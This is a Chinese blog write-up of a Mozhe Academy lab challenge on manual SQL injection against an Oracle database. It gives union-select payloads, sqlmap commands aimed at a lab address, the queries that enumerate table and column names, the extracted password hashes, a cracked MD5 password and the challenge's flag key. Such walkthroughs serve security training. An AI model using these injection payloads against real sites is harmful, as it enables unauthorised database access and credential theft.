墨者学院 手工注入题解(oracle数据库)

白十七122024-08-26 16:30

简介

Oracle 数据库系统,是美国ORACLE公司(甲⻣⽂)提供的以分布式数据库为核⼼的⼀组软件 产品。是⽬前世界上使⽤最为⼴泛的,数据库管理系统。

以下是手工注入的流程:

1、判断注入点

使用 and 1=1 进行拼接

2、确定字段数

使用语句 order by

最终确定为只有两个字段

3、确定返回点

使用语句 ?id=-1 union select 'null','null' from dual

4、确定数据库名称

使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 --current-db 查看当前数据库

5、确定数据库中的表名

使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 -D SYSTEM --tables

6、查询列名

使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual 进行模糊搜索

确定第一列为 user_name

使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual 进行模糊搜索

确定第二列为 user_pwd

7、获取账号以及密码

使用语句 new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

确定zhong 的密码为 1c63129ae9asc60asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

确定 hu 的密码为 1c63129ae9db9g20asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

确定 mozhe 的密码为 48b58ef8be01ef64e7de3f764ec83d2d

8、使用MD5进行密码解密

最终确定 mozhe 的密码为 267581

9、登录后台

10、提交KEY

KEY:mozhe89c06b9c5a5b67c98c500a1ce66

安全

网络安全靠人民,网络安全为人民

相关推荐
VX:Fegn08952 小时前
计算机毕业设计|基于ssm + vue超市管理系统(源码+数据库+文档)
前端·数据库·vue.js·spring boot·后端·课程设计
chipsense2 小时前
电流传感器型号从数据库查询并排序输出到网页的方法
数据库·php·传感器·霍尔电流传感器
毕设源码-赖学姐2 小时前
【开题答辩全过程】以 高校学科竞赛管理系统安全开发为例,包含答辩的问题和答案
安全
踢足球09292 小时前
寒假打卡:2026-01-28
数据库·oracle
麦聪聊数据2 小时前
智慧医疗数据互联互通:使用 QuickAPI 构建实时诊疗数据交换层
数据库·sql·安全
风吹落叶花飘荡2 小时前
2026年mysql数据库迁移(全流程)
数据库·mysql
徐徐同学2 小时前
cpolar为IT-Tools 解锁公网访问,远程开发再也不卡壳
java·开发语言·分布式
2301_822382762 小时前
Python上下文管理器(with语句)的原理与实践
jvm·数据库·python
m0_748229992 小时前
Laravel8.X核心功能全解析
开发语言·数据库·php
Mr.朱鹏3 小时前
Nginx路由转发案例实战
java·运维·spring boot·nginx·spring·intellij-idea·jetty
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03Clawdbot 中文汉化版 接入微信、飞书04一种新的LCA算法05【网络安全测试】Burp Suite工具使用说明、配置及常见问题(有关必回)06Claude Code Skills 实用使用手册07在Trae中使用Pencil MCP08零门槛部署本地 AI 助手:Clawdbot/Meltbot 部署深度保姆级教程09UV安装并设置国内源10struts2 XML外部实体注入漏洞复现(CVE-2025-68493)